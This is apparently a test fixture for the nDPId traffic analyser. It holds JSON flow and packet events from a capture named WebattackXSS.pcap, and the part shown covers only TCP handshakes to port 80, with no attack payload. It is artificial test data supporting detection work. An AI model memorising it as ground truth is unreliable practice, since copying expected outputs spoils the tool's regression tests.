-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347337226,"flow_last_seen":1499347337226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347337226,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1499347337226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347337226,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TYVAAD4GeEusEAABwKgKMts0AFCRRx1LAAAAAKACchCC5AAAAgQFtAQCCAoBOlDOAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3071,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":2,"flow_last_seen":1499347337226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347337226,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2zQKH2urkUcdTKAScSDn0AAAAgQFtAQCCAoD5CJEATpQzgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3072,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":3,"flow_last_seen":1499347337227,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347337227,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TYZAAD4GeFKsEAABwKgKMts0AFCRRx1MCh9rrIAQAOWG2AAAAQEICgE6UM4D5CJE"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3082,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347338485,"flow_last_seen":1499347338485,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347338485,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3082,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1499347338485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347338485,"pkt":"ABm5CmnxAMGxFOsxCABFAAA871JAAD4G1n2sEAABwKgKMttCAFArWL1bAAAAAKACchBHegAAAgQFtAQCCAoBOlIJAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3083,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":2,"flow_last_seen":1499347338485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347338485,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ20LSM68cK1i9XKAScSCfpgAAAgQFtAQCCAoD5CN+ATpSCQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3084,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":3,"flow_last_seen":1499347338486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347338486,"pkt":"ABm5CmnxAMGxFOsxCABFAAA071NAAD4G1oSsEAABwKgKMttCAFArWL1c0jOvHYAQAOU+rgAAAQEICgE6UgkD5CN+"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3097,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347339782,"flow_last_seen":1499347339782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347339782,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3097,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1499347339782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347339782,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8e9RAAD4GSfysEAABwKgKMttQAFCK9SiZAAAAAKACchB7TQAAAgQFtAQCCAoBOlNNAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3098,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":2,"flow_last_seen":1499347339782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347339782,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ21AZ1nzCivUomqAScSC87AAAAgQFtAQCCAoD5CTDATpTTQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3099,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":3,"flow_last_seen":1499347339783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347339783,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0e9VAAD4GSgOsEAABwKgKMttQAFCK9SiaGdZ8w4AQAOVb9AAAAQEICgE6U00D5CTD"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3106,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347341106,"flow_last_seen":1499347341106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347341106,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3106,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1499347341106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347341106,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aWRAAD4GXGysEAABwKgKMtteAFBkzD38AAAAAKACchCKugAAAgQFtAQCCAoBOlSYAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3107,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":2,"flow_last_seen":1499347341106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347341106,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ217gSFdsZMw9\/aAScSAp8gAAAgQFtAQCCAoD5CYOATpUmAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":3,"flow_last_seen":1499347341107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347341107,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aWVAAD4GXHOsEAABwKgKMtteAFBkzD394EhXbYAQAOXI+QAAAQEICgE6VJgD5CYO"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347342386,"flow_last_seen":1499347342386,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347342386,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1499347342386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347342386,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DyJAAD4Gtq6sEAABwKgKMttsAFDfC1r6AAAAAKACchDyLgAAAgQFtAQCCAoBOlXYAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3116,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":2,"flow_last_seen":1499347342386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347342386,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ22zAs3dz3wta+6AScSCPtAAAAgQFtAQCCAoD5CdOATpV2AEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":3,"flow_last_seen":1499347342387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347342387,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DyNAAD4GtrWsEAABwKgKMttsAFDfC1r7wLN3dIAQAOUuvAAAAQEICgE6VdgD5CdO"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347343672,"flow_last_seen":1499347343672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343672,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56186,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1499347343672,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347343672,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83PZAAD4G6NmsEAABwKgKMtt6AFBC4YvvAAAAAKACchBcFQAAAgQFtAQCCAoBOlcZAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3128,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":2,"flow_last_seen":1499347343672,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347343672,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ23pctqnYQuGL8KAScSAp8gAAAgQFtAQCCAoD5CiPATpXGQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":3,"flow_last_seen":1499347343673,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347343673,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03PdAAD4G6OCsEAABwKgKMtt6AFBC4YvwXLap2YAQAOXI+AAAAQEICgE6VxoD5CiP"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347219208,"flow_last_seen":1499347224678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54862,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347219208,"flow_last_seen":1499347224678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54862,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347220447,"flow_last_seen":1499347225677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54876,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347220447,"flow_last_seen":1499347225677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54876,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347221694,"flow_last_seen":1499347227677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54890,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347221694,"flow_last_seen":1499347227677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54890,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347224338,"flow_last_seen":1499347229678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54916,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347224338,"flow_last_seen":1499347229678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54916,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347215361,"flow_last_seen":1499347220676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54822,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347215361,"flow_last_seen":1499347220676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347216659,"flow_last_seen":1499347221677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54836,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347216659,"flow_last_seen":1499347221677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54836,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347346211,"flow_last_seen":1499347346211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347346211,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1499347346211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347346211,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZYhAAD4GYEisEAABwKgKMtuUAFCjBDwcAAAAAKACchBJMAAAAgQFtAQCCAoBOlmUAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":2,"flow_last_seen":1499347346211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347346211,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ25SXkk2howQ8HaAScSA17QAAAgQFtAQCCAoD5CsKATpZlAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3151,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":3,"flow_last_seen":1499347346211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347346211,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZYlAAD4GYE+sEAABwKgKMtuUAFCjBDwdl5JNooAQAOXU9AAAAQEICgE6WZQD5CsK"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3160,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347347483,"flow_last_seen":1499347347483,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347347483,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56226,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3160,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1499347347483,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347347483,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8D8lAAD4GtgesEAABwKgKMtuiAFCZ3FUbAAAAAKACchA4DQAAAgQFtAQCCAoBOlrSAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3161,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":2,"flow_last_seen":1499347347483,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347347483,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ26Ji05dMmdxVHKAScSAOoAAAAgQFtAQCCAoD5CxIATpa0gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":3,"flow_last_seen":1499347347484,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347347484,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0D8pAAD4Gtg6sEAABwKgKMtuiAFCZ3FUcYtOXTYAQAOWtpwAAAQEICgE6WtID5CxI"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3176,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347348776,"flow_last_seen":1499347348776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347348776,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56240,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3176,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1499347348776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347348776,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8P2lAAD4GhmesEAABwKgKMtuwAFBd3mN8AAAAAKACchBkWQAAAgQFtAQCCAoBOlwVAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":2,"flow_last_seen":1499347348776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347348776,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ27AjVjRJXd5jfaAScSDcKQAAAgQFtAQCCAoD5C2LATpcFQEDAwc="} 